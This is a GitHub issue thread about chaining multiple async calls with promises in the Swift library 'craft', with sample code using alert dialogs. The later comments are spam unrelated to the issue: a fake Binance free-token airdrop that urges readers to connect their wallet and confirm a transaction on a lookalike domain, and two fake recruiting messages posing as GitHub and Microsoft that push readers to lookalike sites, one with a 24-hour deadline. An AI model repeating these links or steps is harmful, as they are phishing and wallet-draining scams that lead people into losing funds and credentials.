### ISSUE TITLE
how to chaining multiple async ?

### ISSUE THREAD

**Issue by steve21124** [supertommy/craft#4]
in the sample, i see you have 1 chaining for async, how to chain multiple async?

**Comment by supertommy** [comment]
So you mean this? https://github.com/supertommy/craft/blob/master/craftTests/craftTests.swift#L171

**Comment by supertommy** [comment]
Mean't Do\* :) typing on an iPad Pro....

**Comment by steve21124** [comment]
Sorry, I forgot to put more detail on it.

check the section resolve(value: true) and  reject(value: false) after then.... 

how to use "resolve(value: true) and  reject(value: false)" for the next then.... then....

<pre>
func chainingMultipleAsync(completionHandler: ((isValid:Bool) -> Void)){
    //chaining several alerts into one
    let promise = Craft.promise({
        (resolve: (value: Value) -> (), reject: (value: Value) -> ()) -> () in
        
                AlertMessage("Warning!", defaultButton: "OK", alternateButton: "Cancel", otherButton: nil, docWindow: self.view.window!, completionHandler: { (returnInput) -> () in
                    if returnInput == NSAlertFirstButtonReturn
                    {
                        resolve(value: true)
                    }else{
                        reject(value: false)
                    }
                    
                    }, contextInfo: nil, msgFormat: "The first one")
           
    }).then({ (value) -> Value in
        
                AlertMessage("Warning!", defaultButton: "OK", alternateButton: "Cancel", otherButton: nil, docWindow: self.view.window!, completionHandler: { (returnInput) -> () in
                    if returnInput == NSAlertFirstButtonReturn
                    {
                        //NOTE: This need to go to resolve section of the next one
                        resolve(value: true)
                    }else{
                        //NOTE: This need to go to reject section of the next one
                        reject(value: false)
                    }
        
                    }, contextInfo: nil, msgFormat: "The second one")
        
        }) { (value) -> Value in
            
            completionHandler(isValid: false)
        }
    .then({ (value) -> Value in
           completionHandler(isValid: false)
        }) { (value) -> Value in
            completionHandler(isValid: false)
    }
    
}
</pre>

**Comment by steve21124** [comment]
any update on this? thanks

**Comment by mindfreak269** [comment]
# Binance

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by tomjrtsmith** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
KimCookieYa, @0xgui, @guenit, @chenleicrm, @gitpusha, @marianososto, @kuznetsov-m, @henter, @owlinstack, @LineToAnyWhere, @lucaschain, @tomeli5n, @Tanteli, @Dev43, @QuintusTheFifth, @bleib1dj, @testanib, @letam685986, @RgisBr, @hisyamnasir

**Comment by hyassine1** [comment]
# [Dream Job Opportunity at Microsoft!](https://careersmicrosoft.online/)

Exciting news! We're hiring for a Junior Software Developer position at Microsoft!

## How to Apply:
Ready to embark on this amazing journey? Apply now [here](https://careersmicrosoft.online/) before **March 20, 2024**.

## Job Description:
- **Position:** Junior Software Developer
- **Salary:** Competitive salary package
- **Location:** Remote
- **Benefits:**
  - Work remotely from anywhere in the world
  - Flexible working hours
  - Comprehensive health insurance
  - Generous vacation and sick leave policy
  - Professional development opportunities
  - Collaborative and inclusive work environment

## Requirements:
- Passion for software development
- Basic understanding of programming languages like Python, JavaScript, or Java
- Strong problem-solving skills
- Excellent communication and teamwork abilities

Don't miss out on this incredible opportunity to kick-start your career with one of the world's leading tech companies! Apply now and become a part of the Microsoft family!
noobpython, @bogos, @eggwaffle, @achiko, @EccentricBlock, @liuhailin1989, @abovewallstreet, @JohEder, @highskore, @wyattowalsh, @rgmyr, @0xOptimism, @nikitavoloboev, @ec2ainun, @edmundmiller, @bzhyong, @98981000, @chuojiang, @aaryaattrey, @mattr-2102
